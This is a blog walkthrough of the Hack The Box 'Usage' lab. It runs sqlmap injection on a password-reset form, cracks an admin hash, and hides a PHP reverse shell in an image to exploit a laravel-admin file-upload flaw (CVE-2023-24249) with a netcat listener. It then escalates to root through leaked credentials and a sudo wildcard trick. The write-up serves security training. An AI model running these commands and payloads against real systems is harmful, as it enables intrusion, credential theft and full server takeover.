Hack The Box - Usage

06 May 2024 . tech . Comments
#tutorial

Reconnaissance and Initial Steps

Nmap Results

image

I add usage to /etc/hosts with the corresponding ip address given. Then navigate to http://usage.htb

echo "10.10.11.18   usage.htb" | sudo tee -a /etc/hosts

image

Subdomain Enumaration

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.usage.htb" -u http://usage.htb -fs 154

image

and I found admin.usage.htb and added to /etc/hosts

echo "10.10.11.18    admin.usage.htb" | sudo tee -a /etc/hosts

image

Whatweb

whatweb 10.10.11.18

image

I Identified that this website is built using the Laravel framework

https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/laravel

User Flag

After checking out the Password Reset Option and finding it interesting, I fired up Burp Suite. I captured the POST request, as shown below:

image

image

image

I copied the POST request to a text file, which I named request.txt

POST /forget-password HTTP/1.1
Host: usage.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Origin: http://usage.htb
Connection: close
Referer: http://usage.htb/forget-password
Cookie: XSRF-TOKEN=eyJpdiI6IkVMOEV1aUo4VjFHSEw3VEIzeERyRVE9PSIsInZhbHVlIjoiR3R4aVJxRWxMakUvNE1oVkQ0SS9DR3Q1T3FBTnZvS2JTY3R3dlFnZEJ2Z2NhaUp2V0FKTGtJSVdUS2VnK3crSlNrUEFnS2NQMXBBQllrWWJtYmdMR0w1SzdxR2dGY3lsT1BHeVRGNXp3bEttWUNRNmRBSkk4RXkxS0xYK1pOb0wiLCJtYWMiOiJlMzkyYTY1YzJjOGQ2MDdiNWI3MTRiZGIxYzk2N2FlMzNiYzFlNjZiZjk4NWE4MDkyYWE3NjgxMGI5NTMxMjgyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjUxUE5tOW5TYlAxd0FFQ3p2YjhEaXc9PSIsInZhbHVlIjoiTGl0Y3hFZU81Y2F2anNXcXNXa3pVd0RwNHcvYjMzbHBSWTlISW80VjZBSzVjTTZDd3FKVkhiNnhPdDVDejNYK2RVNDcvSERMOGc2dzNFMHpycTBSeGZSemk2TEZyZk5QWDE2N05YM21GcWFDcHJRSjVGSTRFajVhSTBOR0IvOTEiLCJtYWMiOiJiYzYwMDUyMGQzMTk2ODM2ZDkxMTI1NjhmYWFmYmU3YjgxZjMzMjUzZGExYWE1YTQ0MTA1NGI4NjMwYmFhMDU4IiwidGFnIjoiIn0%3D
Upgrade-Insecure-Requests: 1

_token=jElJgEoOoONVCfBoDfa67TPzd6VxBk4o43ObgKlY&email=1*

Now, let’s fire up SQLMap.

sqlmap -r request.txt --level 5 --risk 3 --batch

image

sqlmap -r request.txt --level 5 --risk 3 --batch --dbs

image

sqlmap -r request.txt --level 5 --risk 3 --batch -D usage_blog --tables

image

sqlmap -r request.txt --level 5 --risk 3 --batch -D usage_blog -T admin_users --columns

image

sqlmap -r request.txt --level 5 --risk 3 --batch -D usage_blog -T admin_users -C username,password --dump

image

So I copied the hash and saved it to pass.txt

echo "$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2" > pass.txt

let’s use john to crack it.

john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt

image

and I used these credntials to login to admin portal (admin : whatever1)

image

image

Search for the latest vulnerabilities and find a warning about laravel-admin having an arbitrary file upload vulnerability (CVE-2023-24249). The affected version number is 1.8.19, and the system version number is 1.8.18. It should be affected, and finally found this article:

https://flyd.uk/post/cve-2023-24249/

Let’s prepare the webshell. Here we use kali’s php shell file locate at : /usr/share/webshells/php/php-reverse-shell.php, modified the IP (tun0) and port (4444) information, and then use 010editor to create a picture horse.

cp /usr/share/webshells/php/php-reverse-shell.php .

nano php-reverse-shell.php

image

Now let’s download the 010editor : https://www.sweetscape.com/download/010editor/

Let’s extract and run the 010editor

image

then i went to http://admin.usage.htb and move to administrator settings and i have downlod the admin image like below:

image

Then I open that image from 010editor ( Open File —> select the image file)

image

then In that image, I moved to the end of the header and paste the selected php-reverse-shell code:

image

image

then saved the file as shell.jpg

Initial Foothold

let’s create a netcat listner:

nc -nlvp 4444

Then I fired up the burp suite and intersept the process of uploading shell.jpg.

image

so now we can change the filename to shell.jpg.php and forward the requests:

image

so we got the reverse shell, so let’s get the user.txt

image

Privilege Escalation

I was searching all the options to escalate privileges, but I couldn’t find anything. So, I tried listing all users on the system.

image

I realize I need to locate Xander’s credentials, but how can I do it? And then, I stumbled upon a file (.monitrc) that contained Xander’s credentials.

image

ssh xander@usage.htb

image

root.txt

sudo -l

image

Since this is custom software, there’s no way to attack it using GTFOBins. However, we can utilize the strings command to read binary files.

image

Let’s use wildcards spare tricks: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks

image

so we able to get the root.txt. so let’s use same method to get root shell

image

image

After creating the id_rsa file and granting the required privileges with chmod 600 id_rsa, I used SSH with the -i option to specify the private key and connect to the server

image

image

BOOM !!! :D

Me

c0d3cr4f73r is a cybersecurity enthusiast with a passion for red teaming and malware analysis. Based in Dubai, c0d3cr4f73r has extensive experience in offensive security operations. In their free time, they enjoy diving into the latest cybersecurity challenges.